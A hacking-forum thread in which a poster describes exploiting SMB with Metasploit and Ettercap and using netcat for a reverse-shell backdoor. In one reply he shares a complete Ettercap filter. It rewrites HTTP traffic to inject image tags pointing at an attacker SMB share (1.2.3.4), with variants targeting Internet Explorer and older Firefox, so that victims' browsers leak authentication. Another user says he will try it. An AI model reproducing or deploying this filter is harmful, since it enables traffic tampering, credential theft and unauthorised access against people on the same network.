Results 1 to 4 of 4

Thread: Ettercap/Metasploit and netcat for backdoor

Hybrid View

  1. #1
    Just burned his ISO overide's Avatar
    Join Date
    Nov 2007
    Posts
    21

    Default Ettercap/Metasploit and netcat for backdoor

    Exploiting smb using metasploit, ettercap filters, via http, and used netcat as a backdoor. I used a reverse shell connection to bypass firewalls and or portforwarding.

    I know there are numerous tutorials and videos on it, but I thought I'd throw in my 2 cents. Plus I used some different tools, like genlist, and netcat.

    http://overide.blip.tv/file/1316077/

    -----------------
    Credits:
    -----------------
    Thanks to tutorials by
    pureh@te
    operat0r
    and others who I forgot.

  2. #2
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Nice video, and nice wallpaper. Thanks for sharing!
    Would you like to share your SMB.FILTER also??

    Does it work on Firefox??
    Don't eat yellow snow :rolleyes:

  3. #3
    Just burned his ISO overide's Avatar
    Join Date
    Nov 2007
    Posts
    21

    Default

    Quote Originally Posted by hawaii67 View Post
    Nice video, and nice wallpaper. Thanks for sharing!
    Would you like to share your SMB.FILTER also??

    Does it work on Firefox??


    Here is the SMB.filter

    Yeah, if you look at the SMB.filter you'll see that there is a filter for firefox 2* below, and 2* above.



    ------------------------------------------------

    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    }


    #####################
    # Internet Explorer #
    #####################

    if (ip.proto == TCP && tcp.src == 80) {
    replace("</body>", "<img src=\"\\\\1.2.3.4\\image.jpg\"></body>");
    replace("</Body>", "<IMG SRC=\"\\\\1.2.3.4\\image.jpg\"></body>");
    msg("Filter Ran.\n");
    }

    ############################
    # Firefox prior to 2.0.0.4 #
    ############################

    if (ip.proto == TCP && tcp.src == 80) {
    replace("</body>", "<img src=\"moz-icon:file:////1.2.3.4/share/hello.jpg\"></body>");
    replace("</Body>", "<img src=\"moz-icon:file:////1.2.3.4/share/hello.jpg\"></body>");
    msg("Filter Ran.\n");
    }

    ###################
    # Firefox 2.0.0.4 #
    ###################

    if (ip.proto == TCP && tcp.src == 80) {
    replace("</body>", "<img src=\"moz-icon:file:///%5c/1.2.3.4/share/hello.jpg\"></body>");
    replace("</Body>", "<img src=\"moz-icon:file:///%5c/1.2.3.4/share/hello.jpg\"></body>");
    msg("Filter Ran.\n");
    }


    -------------------------------------

  4. #4
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Thanks, I'll give it a try with firefox.

    Don't eat yellow snow :rolleyes:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •